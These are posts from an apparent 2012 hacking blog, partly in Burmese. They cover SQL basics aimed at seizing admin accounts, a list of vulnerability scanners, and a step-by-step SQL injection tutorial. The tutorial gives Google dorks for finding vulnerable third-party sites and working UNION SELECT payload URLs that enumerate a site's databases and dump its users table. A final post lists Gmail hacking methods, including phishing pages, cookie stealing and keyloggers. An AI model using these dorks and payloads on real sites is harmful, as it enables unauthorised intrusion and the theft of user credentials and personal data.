Thursday, December 27, 2012

SQL Injection Attack



sql injection ကို သံုးဖို ့ တၿခားဘာ tool မွ ေထြေထြထူးထူးမလိုပါဘူး ။ browser တခုရွိေနရင္ပဲ ရပါၿပီ ။ sql injection attack ကို စတင္ေလ့လာေတာ့မယ္ဆိုရင္ sql database နဲ ့ query ေတြအေၾကာင္းကို မသိလို ့မၿဖစ္ပါဘူး ။ဒါေၾကာင့္ ဒီ အေၾကာင္းက အရင္ စတင္ပါ့မယ္ ။

website တခုကို စတင္ တည္ေဆာက္ေတာ့မယ္ဆိုရင္ database ဆိုတာက အေရးၾကီးတဲ့ အစိတ္အပိုင္းတခုပါပဲ ။ ဘာလို ့ဆိုေတာ့ website ရဲ ့ data ေတြ ၊ user ေတြ ၊ post ေတြ စတဲ့ အေရးၾကီးအခ်က္အလက္ေတြကို စုစည္းထားတဲ့ေနရာၿဖစ္လို့ပါ။ ေနာက္အပိုင္းက်မွေသခ်ာရွင္းလင္းၿပပါ့မယ္ ။ database တခုမွာ table တခုကေန မ်ားစြာ အထိပါဝင္နိုင္ပါတယ္ ။ table တခုစီမွာ သက္ဆိုင္ရာ coloum ေတြရွိၿပီး coloum တခုစီရဲ့ေအာက္မွာdata ေတြပါဝင္တဲ့ row ( တခ်ိဳ့က record လို ့ေခၚပါတယ္) ေတြရွိပါတယ္ ။ ဒီေလာက္ပဲ မွတ္ထားပါအံုး ။

ကဲ...sql အေၾကာင္း စလိုက္ၾကရေအာင္ ။ sql ဆိုတာ sever scripting language တခု ပါ ။ database တခုကို query ေတြ သံုးၿပီး table ေတြကို ဖ်က္မယ္၊ ၿပင္မယ္၊ထပ္တိုးမယ္။ data ေတြကို ဖ်က္မယ္၊ၿပင္မယ္၊ထပ္တိုးမယ္။ စတာေတြကို sql query ေတြသံုးၿပီး ၿပဳၿပင္ေၿပာင္းလဲတဲ့ language တခုပါ ။ ဥပမာ ... vulnerability ရွိေနတဲ့ ဆိုဒ္တခုကို injection ထိုးလို ့ ေပါက္ၿပီဆိုရင္ site admin ရဲ့ acc ေတြကိုဖ်က္မယ္ ၿပင္မယ္ username နဲ ့ password ေတြကိုၿပင္မယ္၊ အစားထိုးမယ္ ။ ဒါေတြကို လုပ္ေဆာင္ၾကရပါမယ္ ။ အဲလိုလုပ္ေဆာင္ဖို ့ဆိုရင္ အခုေၿပာမယ့္ sql query ေတြကိုနားလည္ထားရပါမယ္ ။တကယ္လို ့ မိမိ site ကို hack ခံထိၿပီဆိုပါေတာ့၊ database ကို ဝင္လို ့ရေသးရင္ ဒီ query ေတြသံုးၿပီး ၿပန္ယူနိုင္ပါတယ္။ေနာက္ဆံုး မိမိဆိုဒ္ကို injection ၿပန္ထိုးၿပီး ၿပန္ယူနိုင္ပါတယ္ ။ ဒီေတာ့ ဒီေနရာကစၿပီး ေသခ်ာနားလည္ေအာင္ ေလ့လာရမွာၿဖစ္ပါတယ္ ။

SQL select statement ကေန စၾကရေအာင္ ... ေအာက္က query ေလးကိုၾကည့္ပါ ။

select coloum_name
from table_name

ဒါက column ေတြကိုၿပသေအာင္လုပ္တဲ့ query ပါ ။ column_name ေနရာမွာ column ရဲ ့ အမည္ကို ထည့္ရမွာၿဖစ္ၿပီး column အားလံုးကိုေခၚၾကည့္မယ္ဆိုရင္ * (ခေရပြင့္ သေကၤတ) ေလးကိုထည့္ေပးပါ ။ဒီေကာင္က အားလံုးကိုမွတ္ပါဆိုတဲ့ အဓိပၸါယ္ပါ ။ table_name ေနရာမွာ table ရဲ ့အမည္ကို ေရးရမွာပါ။

ကၽြန္ေတာ္တို ့ database က table တခုရဲ ့ အမည္က smf_1users ဆိုပါစို ့ဗ်ာ ။ smf_1users ဆိုတဲ့ table ရဲ့ ေကာ္လံေတြနဲ့ data ေတြကို ေခၚၾကည့္ခ်င္တယ္ဆိုရင္.............

select *
from smf_1users

ဒါဆိုရင္ smf_1users ဆိုတဲ့ table ရဲ ့ ေကာ္လံ အားလံုးနဲ့ row အားလံုး က်လာပါလိမ့္မယ္ ။လက္ေတြ့လုပ္ေဆာင္ၾကည့္ခ်င္တယ္ဆိုရင္ မိမိ database ရဲ ့ php my admin ကိုသြားပါ ။ အဲဒီမွာ query ဆိုတဲ့ tab ကို နွိပ္ၿပီး command ေတြကို ေရးၿပီး ေလ့က်င့္နိုင္ပါတယ္ ။ database မရွိတဲ့သူမ်ားကေတာ့ w3school.com မွာေလ့က်င့္ဖို ့ေနရာေပးထားပါတယ္။ အေသးစိတ္လဲေရးသားထားပါတယ္ ။web သမားတိုင္း w3school ဆိုရင္သိၾကမွာပါ ။ beginner မ်ားကေတာ့ www.w3school.com လို ့ ရိုက္ၿပီး ေလ့လာနိုင္ပါတယ္ ။

ဒီတခါေတာ့ SQL where clause အေၾကာင္းေလးေလ့လာၾကရေအာင္......အသံုးၿပဳမယ့္ syntax ေလးကေတာ့ ဒီလိုပါ။

select*
from table_name
where column_name + operator +values

ထံုးစံအတိုင္း select * ဆိုတာကေတာ့ ေကာ္လံေတြ အကုန္လံုးကို ေခၚၾကည့္ဖို့ command ပါ ။ table_name ေနရာမွာ မိမိၾကည့္မယ့္ table ရဲ ့အမည္ကိုထည့္ပါ ။ where ဆိုတဲ့ command ကေတာ့ ေကာ္လံတခုရဲ ့ ေအာက္ကတိတိက်က်သိထားတဲ့ row တခုကို ေခၚၾကည့္ဖို့ပါ ။ ရွဳပ္သြားၿပီထင္ပါတယ္။ေအာက္မွာထပ္ရွင္းပါ့မယ္။

( စာၾကြင္း ။ ။ Sql query command ေတြကိုေရးတဲ့အခါမွာ တိတိက်က်ေရးသားရမယ္လို ့ မသတ္မွတ္ထားပါဘူး ။ javascript variables ေတြကို ေရးတဲ့အခါ မွာ C အၾကီးနဲ့c အေသးမတူပါဘူး ။ js ဟာ sensitive ၿဖစ္ပါတယ္ ။ စာလံုးအၾကီးအေသး ေသခ်ာခြဲၿခားေရးရပါတယ္ ။ sql ကေတာ့ no sensitive ပါ ။ SELECT နဲ့ select တူတူပါပဲ ။ ဒါေလးတခ်က္ေလာက္သိထားရပါမယ္။ )

ကၽြန္ေတာ္တို့ SMF_1USERS ဆိုတဲ့ TABLE မွာ user ေတြက ေထာင္ခ်ီရွိတယ္ဆိုပါေတာ့ဗ်ာ . ဆိုလိုတာက row ေတြအမ်ားၾကီးရွိတယ္ဆိုပါေတာ့ ။ ေကာ္လံ name ေတြကလဲ အမ်ားၾကီးပဲ ။ ကၽြန္ေတာ္တို ့ ၿမင္ခ်င္တာက admin ရဲ့ data အခ်ိဳ့ပဲဗ်ာ ။ ဆိုလိုတာက admin ရဲ့ username ၊ password ၊ email စတာေတြေပါ့ ။ ေကာ္လံ name ေတြအမ်ားၾကီးထဲက ကၽြန္ေတာ္တို ့ေခၚၾကည့္မွာက usernameရွိတဲ့ user_name ၊ password ရွိတဲ့ user_password၊ email ရွိတဲ့ user_email ဆိုတဲ့ ေကာ္လံေတြဆိုပါစို ့ ။ ဒါ နမူနာေၿပာတာေနာ္ ။ site တခုနဲ့တခုအမည္ေပးပံုၿခင္းတူခ်င္မွတူမွာပါ ။ မိတ္ေဆြတို ့က ေမးပါလိမ့္မယ္ ။ သူမ်ား site ရဲ ့ ေကာ္လံ name ေတြကို ဘယ္လို သိမွာလဲလို ့ ..... ဟုတ္ကဲ့.... site မွာ vulnerability ရွိလို ့ injection ထိုးၿပီး ေပါက္ၿပီဆိုရင္ၿဖင့္ query ေတြ သံုးၿပီး သိေအာင္လုပ္နိုင္ပါတယ္။ေနာက္ပိုင္းေရးသားခ်က္ေတြမွာေတြ ့ရမွာပါ ။အခုစကားစပ္မိလို့ေၿပာတာပါ။ကဲ...ဆက္ရေအာင္....

select user_name, user_password, user_email
from smf_1users
where user_name='admin'

ဒါဆိုရင္ user_name ဆိုတဲ့ ေကာ္လံေအာက္မွာ admin ဆိုတဲ့ စာလံုးရွိတဲ့ row တခုပဲ က်လာပါလိမ့္မယ္ ။ က်န္တဲ့ user ေတြရဲ့ row ေတြ က်လာမွာမဟုတ္ပါဘူး ။ query command ကို ၿပန္ရွင္းရရင္ select user_name, user_password, user_email ဆိုတာက user_name, user_password, user_email ဆိုတဲ့ ေကာ္လံ 3 ခုကိုပဲ မွတ္ၿပီး ၿပပါလို ့ဆိုတာပါ ။ line 2 ကေတာ့ သိၿပီးသားပါ ။ table ကိုညႊန္းတာပါ ။ line 3 ကေတာ့ user_name ဆိုတဲ့ ေကာ္လံဟာ admin ဆိုတဲ့ တန္ဖိုးရွိတယ္လို ့ = operator နဲ့ ေၾကၿငာလိုက္တာပါ ။ ဆိုလိုတာက user_name ေကာ္လံေအာက္မွာ admin ဆိုတဲ့ value ရွိေနတဲ့ row တခုပဲ မွတ္ၿပီး ၿပပါလို ့ command ေပးလိုက္တာပါ ။ operators သေကၤတေတြနဲ့ အသံုးၿပဳပံုေတြ ကိုေတာ့ ကၽြန္ေတာ္ဆက္လက္ေရးသားမယ့္ အပိုင္းမွာ ေလ့လာၾကပါ ။ where clause အခန္းဟာ အေရးၾကီးၿပီး အသံုးမ်ားသလို operator ေတြနဲ့ တြဲသံုးပံုေတြကိုပါေသခ်ာသိထားမွ အသံုးခ်နိုင္မွာၿဖစ္လို ့ ေသခ်ာေလ့လာရမယ့္ အခန္းၿဖစ္ပါတယ္ ။

where clause နဲ့ operator ေတြ တြဲသံုးတဲ့ အပိုင္းကို ဆက္ၾကရေအာင္.... တြဲသံုးရတဲ့ operator ေတြကို ေအာက္မွာအရင္ က်က္မွတ္လိုက္ပါ ။ operator သေကၤတ ေတြေနာက္မွာ သံုးတဲ့ values တန္ဖိုးေတြကိုေရးတဲ့အခါမွာ စာလံုး (word) ေတြဆိုရင္ single quote (') ထည့္ေပးရပါမယ္ ။ ကိန္းဂဏန္းေတြဆိုရင္ single quote ( ' ) ထည့္စရာမလိုပါဘူး ။ဒီအခ်က္မွာမွားယြင္းရင္ query လုပ္တဲ့အခါ အလုပ္လုပ္မွာမဟုတ္ပါဘူး ။

Operator Description

= Equal
<> Not equal > Greater than
< Less than
>= Greater than or equal
<= Less than or equal BETWEEN Between an inclusive range LIKE Search for a pattern IN If you know the exact value you want to return for at least one of the columns တခ်ိဳ ့ version ေတြမွာ < > ကို != ဒီလိုေရးပါတယ္ ။ ဒါေတြကို w3school ကပဲ အလြယ္ကူးေပးလိုက္တယ္ေနာ္..တခုခ်င္းကို where clause နဲ့ ဘယ္လိုတြဲသံုးရမယ္ဆိုတာကို ေအာက္မွာေရးသားပါ့မယ္ ။

= operator

ဒီေကာင္ကို သံုးပံုေလးေအာက္မွာၾကည့္ပါ ။ အေပၚမွာလဲ ရွင္းၿပီးပါၿပီ .. ဒီမွာ ထပ္ၿပီးရွင္းခ်င္ပါတယ္ ။ post ေတြမ်ားေအာင္ေရးတာမဟုတ္ပဲ... က႑ ေလးအလိုက္ေရးေတာ့ ဖတ္သူ ၿမင္သာၿပီး မွတ္ရတာလြယ္ကူေစမွာမို ့ပါ ။

select*
from table_name
where column_name= value

line 1 နဲ့ line 2 က သိၿပီးသားပါ ..မရွင္းေတာ့ပါဘူး ။ line 3 ကိုရွင္းပါ့မယ္ ။ where column_name ဆိုတာကေတာ့ မိမိေခၚၾကည့္မယ့္ table က မိမိလိုခ်င္တဲ့ data ရွိမယ့္ column_name ကို ရည္ညႊန္းတာပါ ။ တိတိက်က်ထပ္ညႊန္းဖို ့ = operator ကို သံုးလိုက္ပါတယ္ ။ ဆိုလိုတာက table ရဲ့ ေကာ္လံတခုေအာက္က တိတိက်က် data တခုရွိတဲ့ row ကို မွတ္ၿပီး ၿပခိုင္းလိုက္တာပါ ။ ဥပမာ...ၾကည့္ပါ ။

ကၽြန္ေတာ္တို ့ smf_1users ဆိုတဲ့ table မွာ user_name ဆိုတဲ့ ေကာ္လံရွိေနတာေတြ ့ၿပီဆိုပါစို ့ဗ်ာ ။ အဲဒီေအာက္မွာရွိတဲ့ admin ဆိုတဲ့ user ရဲ ့ data ေတြကိုပဲၾကည့္ခ်င္တယ္ ။

select*
from smf_1users
where user_name='admin'

ဒါကေတာ့ query command ပါ ။ = operator ကို သံုးထားတဲ့အတြက္ ဒီ column ေအာက္မွာ admin ဆိုတဲ့ value တခု ေသခ်ာရွိေနရပါမယ္ ။ = ဆိုတာ ထပ္တူညီသေကၤတကိုဗ် .. စာလံုးတလံုးေတာင္ လြဲလို့မရပါဘူး ။ လြဲတာနဲ့ အလုပ္မလုပ္ေတာ့ပါဘူး ။ ဒီ operator က အသံုးဝင္ပါတယ္ ။ ကၽြန္ေတာ္တို ့ စီးပြားေရးလုပ္ငန္းအတြက္ မိမိ ေဖာက္သည္ေတြရဲ ့ အခ်က္အလက္ေတြကို database တခုေဆာက္ၿပီး customers လို ့ table name ေပးထားမယ္ ... column 3ခု ထားမယ္ဗ်ာ ... ေဖာက္သည္ရဲ ့ အမွတ္စဥ္ နံပါတ္က တခု ၊ အမည္ကတခု ၊ လိပ္စာ address က တခု ေပါ့ဗ်ာ ... ဒီမွာ ကၽြန္ေတာ္တို ့က U Win ဆိုတဲ့ ေဖာက္သည္ရဲ ့ လိပ္စာကို အေရးတၾကီး သိဖို ့လိုအပ္လာၿပီဗ်ာ ... ခက္တာက သူရဲ့ အမွတ္စဥ္ကို ေမ့ေနၿပီ row ဘယ္ေလာက္မွာ ရွိလဲမသိေတာ့ဘူး ။ တခုခ်င္းရွာရေအာင္ကလဲ ROW ေတြက ေထာင္ေသာင္းခ်ီေနတာကိုဗ် .။ အခ်ိန္အဲေလာက္မေပးနိုင္ဘူး ။ ဒါေပမယ့္ သူ ့အမည္ကိုေတာ့ ကၽြန္ေတာ္တို ့ သိေနတာပဲ .. ဒါေၾကာင့္ QUERY နဲ့ရွာမယ္ဗ်ာ .. ။

SELECT*
FROM CUSTOMERS
WHERE CUSTOMER_NAME='U WIN'

ဒါဆိုရင္ CUSTOMER_NAME ေကာ္လံေအာက္မွာ ရွိေနတဲ့ U WIN ဆိုတဲ့ VALUE ရွိေနတဲ့ ROW တခုပဲ က်လာပါလိမ့္မယ္ ။ ဒါဆို သူလိပ္စာကို သိနိုင္ၿပီေပါ့ ။ ဘာလို ့လဲဆိုေတာ ့ ေကာ္လံေတြအကုန္က်လာေအာင္လို ့ SELECT* ကို သံုးထားတယ္ေလ ... ။ ဒီေလာက္ဆိုရင္ = OPERATOR ကို သံုးနည္းနဲ့ သေဘာသဘာဝကို နားလည္ေလာက္ၿပီထင္ပါတယ္ ။ဒီလိုေရးၿပရတာကလဲ စာဖတ္သူ ေတြးတတ္ေအာင္ပါ ။ ခ်ဲ့နိုင္သေလာက္ခ်ဲ့ၿပီးေတြးရပါ့မယ္ ။ SQL INJECTION ဟာ ေတြးနိုင္သူတာ ေအာင္ၿမင္မွဳရနိုင္ပါတယ္ ။ ခ်ဲ့ထြင္ေတြးေတာၿပီး သံုးစြဲၾကရပါမယ္ ။


Credit: Titegyithar

Friday, November 30, 2012

Websit မ်ား၏ အားနည္းခ်က္ ကို ရွာေဖြျခင္း (အေပါက္ရွာျခင္း)



 Web vulnerability scanning  is using & scanning a computer program designed to assess computers, computer systems, networks or applications for weaknesses. There are a number of types of vulnerability scanners available today, distinguished from one another by a focus on particular targets. While functionality varies between different types of vulnerability scanners, they share a common, core purpose of enumerating the vulnerabilities present in one or more targets. Vulnerability scanners are a core technology component of vulnerability management.

A vulnerability scanner can be used to conduct network reconnaissance, which is typically carried out by a remote attacker attempting to gain information or access to a network on which it is not authorized or allowed. Network reconnaissance is increasingly used to exploit network standards and automated communication methods. The aim is to determine what types of computers are present, along with additional information about those computers—such as the type and version of the operating system. This information can be analyzed for known or recently discovered vulnerabilities that can be exploited to gain access to secure networks and computers. Network reconnaissance is possibly one of the most common applications of passive data analysis. Early generation techniques, such as TCP/IP passive fingerprinting, have accuracy issues that tended to make it ineffective. Today, numerous tools exist to make reconnaissance easier and more effective.

1. WebCruiser - Web Vulnerability Scanner for Windows V2.6.1

WebCruiser - Web Vulnerability Scanner, an effective and powerful web penetration testing tool that will aid you in auditing your website! It has a Vulnerability Scanner and a series of security tools.

It can support scanning website as well as POC (Proof of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also an automatic SQL injection tool, an XPath injection tool, and a Cross Site Scripting tool!

Key Features:
* Crawler(Site Directories And Files);
* Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.;
* SQL Injection Scanner;
* SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept);
* SQL Injection for SQL Server: PlainText/Union/Blind Injection;
* SQL Injection for MySQL: PlainText/Union/Blind Injection;
* SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection;
* SQL Injection for DB2: Union/Blind Injection;
* SQL Injection for Access: Union/Blind Injection;
* Post Data Resend;
* Cross Site Scripting Scanner and POC;
* XPath Injection Scanner and POC;
* Auto Get Cookie From Web Browser For Authentication;
* Report Output.


Download link - http://sec4app.com/download.htm

 2. Safe3 Web Vulnerability Scanner 7.7


Download link - http://www.softpedia.com/get/Internet/Other-Internet-Related/Safe3-Web-Vulnerability-Scanner.shtml


3. WSSA 

WSSA is driven by the same vulnerability assessment system we provide to governments and corporations; AVDS. Every scan starts by testing the equipment that hosts your site. No matter how carefully coded your pages are, if the host equipment is vulnerable, your site is at risk.

Then WSSA automatically tests your website pages for all of the known code vulnerabilities like:

    SQL Injection
    XSS (Cross Site Scripting)
    File Disclosure
    Remote File Inclusion
    PHP/ASP Code Injection
    Directory Traversal 


Download link - https://secure.beyondsecurity.com/vulnerability-scanner-signup?step=1
 
4. Vulnerability Scanner - Nexpose Community Edition

The Nexpose Community Edition is a free, single-user vulnerability scanner specifically designed for very small organizations or individual use. Nexpose Community Edition is powered by the same scan engine as award-winning Nexpose Enterprise Edition and offers many of the same features. Support is available via the extensive Rapid7 Community.
 

Download link - http://www.rapid7.com/vulnerability-scanner.jsp

5. Trust Guard

Download link - https://www.trust-guard.com/compare-Trust-Seals-s/1.htm

6. Retina Web-Security Scanner

Hackers are increasingly targeting web applications with Gartner estimating that 70% of attacks against websites occurring at the application layer. At the same time, many enterprises increasingly rely on web applications to house critical business data, as well as confidential customer information such as credit card and social security numbers. With so much information and activity online, you need a comprehensive web application scanner that accurately assesses your exposure to attacks.

Powerful Security for Web Applications
Retina Web Security Scanner is a best-in-class web scanning solution that rapidly and accurately scans large, complex web sites and web applications to tackle web-based vulnerabilities. Retina Web Security Scanner identifies application vulnerabilities as well as site exposure risk, ranks threat priority, produces highly graphical, intuitive HTML reports, and indicates site security posture by vulnerabilities and threat level.


Download link - http://go.beyondtrust.com/retina-trial

7. SecuBat Vulnerability Scanner

As the popularity of the web increases and web applications become tools of everyday use, the role of web security has been gaining importance as well. The last years have shown a significant increase in the number of web-based attacks. For example, there has been extensive press coverage of recent security incidences involving the loss of sensitive credit card information belonging to millions of customers.

Typical web application security vulnerabilities result from generic input validation problems. Examples of such vulnerabilities are SQL injection and Cross-Site Scripting (XSS). Although the majority of web vulnerabilities are easy to understand and to avoid, many web developers are, unfortunately, not security-aware. As a result, there exist many web sites on the web that are vulnerable.

SecuBat is a generic and modular web vulnerability scanner that, similar to a port scanner, automatically analyzes web sites with the aim of finding exploitable SQL injection and XSS vulnerabilities. 


Download link - http://secubat.codeplex.com/downloads/get/103432

8. Acunetix Web Vulnerability Scanner 8.0 Build

Download link - http://www.softpedia.com/get/Internet/WEB-Design/Source-Site-Protectors/Acunetix-Web-Vulnerability-Scanner.shtml

9. Nessus Web Vulnerability Scanner

Download link - http://www.tenable.com/products/nessus/nessus-download-agreement

10. WebCruiser Web Vulnerability Scanner

Download link - http://download.cnet.com/WebCruiser-Web-Vulnerability-Scanner/3000-18510_4-75064882.html



Saturday, November 24, 2012

SQL Injection: A Step-by-Step Tutorial


SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

Step-by-Step tutorial for SQL Injection

Step 1: Find a website that is vulnerable to the attack. This is the first step in SQLi and like every other hack attack is the most time consuming, and is the only time consuming step. Once you get through this, rest is a cake-walk. Now, let us all know what kind of pages are vulnerable to this attack. We are providing you with a few dorks(google strings to find vulnerable sites). Though at the end of this post, we'll provide a list of vulnerable sites.

Dorks:
"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id= 
and you can also write your own.

How to check if a webpage is vulnerable to this attack???
Once you execute the dorks and get the preferred search results. Say for example
hxxp://www.abcd.com/index.php?catid=1

Add a ' (apos) at the end of the URL. Such that the URL looks like
hxxp://www.abcd.com/index.php?catid=1'

If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result.

Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():

Step 2:Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you.

Append an 'order by' statement to the URL.
eg. hxxp://www.abcd.com/index.php?catid=1 order by 1

Continue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table. Now to know the column numbers which are accepting the queries.

Append an 'Union Select' statement to the URL. Also precede the number after "id=" with a hyphen or minus.
Say from the above step, you got that the table has 6 columns.
eg. hxxp://www.abcd.com/index.php?catid=-1 union select 1,2,3,4,5,6

Result of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns.

Step 3: Enumerating the SQL version
We'll use the mysql command @@version or version() to get the version of the db. We have to inject the command in one of the open columns. Say we use column number 2.

eg. hxxp://www.abcd.com/index.php?catid=-1 union select 1,@@version,3,4,5,6

You'll get the version of the database in the place  where you had got the number 2. If the starting of the version number is 5 or more, then you are good to go. If less move on to another site.

Step 4:  Expolit
To get list of databases:
hxxp://www.abcd.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--

Result will display a list of databases on the site. Here on, we'll write the results we have got from our test.
Result: information_schema,vrk_mlm

To know the current database in use:
hxxp://www.abcd.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6--
Result: vrk_mlm

To get the current user:
hxxp://www.abcd.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost

To get the tables:
hxxp://www.abcd.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users

We'll concentrate our attack on the users table.

To get the columns:
hxxp://www.abcd.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
Result:  admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,
prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,
refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,
email_id,password,edited_on,last_login,created_on,chain_number,phone,address

By lookin at the columns closely, and the order of the tables, we can conclude that starting from id,incredible_id are the columns belonging to the users table and we are interested in that.

Extract information:
union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0
x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--

source :  http://techkranti.blogspot.com/p/sql-injectable-sites.html

Happy Hacking!!!


Sunday, October 7, 2012

Gmail Hacking ႏွင့္ ပါတ္သက္၍


1.Fake Login Pages
2.Cookie Stealing
3.Trojans.
4.key loggers
5.spywares or u can say tht malicious activeX... or scripts.
6.packet catching


1. Fake Login Pages ဆိုတာကေတာ့ Phishing နည္းပညာတစ္ခုပဲ.. ၄င္းကို XSS, Social Engineering နဲ႔ ေပါင္းလိုက္ရင္ပိုၿပီး အစြမ္းထက္တယ္...
image
စမ္းသပ္ရန္ေနရာ http://www.planetcreator.net/tutorial/Fake Login/Gmail.htm
စမ္းသပ္ထားေသာ Password ကိုၾကည့္ရန္
http://www.planetcreator.net/tutorial/Fake Login/FakeLoginPasswords.htm

2.Cookie Stealing
ဒါကေတာ့ အကယ္၍ မိမိက Mail တစ္ခုကို login ၀င္လိုက္တဲ့ အခ်ိန္မွာ
မိမိရဲ့ Session ID, Cookies ေတြကို Browser ကိုပို႔ပါတယ္... ဒါကေတာ့ မိမိက ဘယ္အခ်ိန္မွာ ဘယ္ေလာက္ၾကာၾကာ၀င္ခဲ့တယ္.. သုံးခဲ့တယ္..ဘယ္ႏွစ္ႀကိမ္ ဒီ Website, ဒီ mail ကိုသုံးတယ္ဆိုတာကို မွတ္တမ္းတင္တာပါ။ ဒီလို Cookies ေတြကို နည္းမ်ိဳးစုံနဲ႔ ခိုးလို႔ရပါတယ္။ cookie stealer ေတြအမ်ားႀကီးရွိပါတယ္..
greasemonkey လိုမ်ိဳးေတြ
attempts.
for(var i = 0; i != document.links.length; i++)
{
if(document.links[i].href.search(\"mail.google.com\") != -1)
{
document.links[i].href = document.links[i].href.replace(\"http\", \"https\");
}
}ဥပမာ hamster (local wireless)
image
image
image
Hamster ဆိုတာလဲ Session ID and Cookies ခိုးတဲ့ Tool တစ္ခုပါပဲ။
အသုံးျပဳပုံကို ၾကည့္ရန္
http://www.planetcreator.net/2007/10/28/hamster-20-sidejacking/

3.Trojans
ဆိုတာကေတာ့ ရွင္းပါတယ္.. မိမိရဲ့ စက္ထဲက information ေတြကို ရဖို႔အတြက္ Attacker ေတြက ႀကိဳတင္ေရးသြင္းထားတဲ့ programming code ေတြပါပါတယ္...
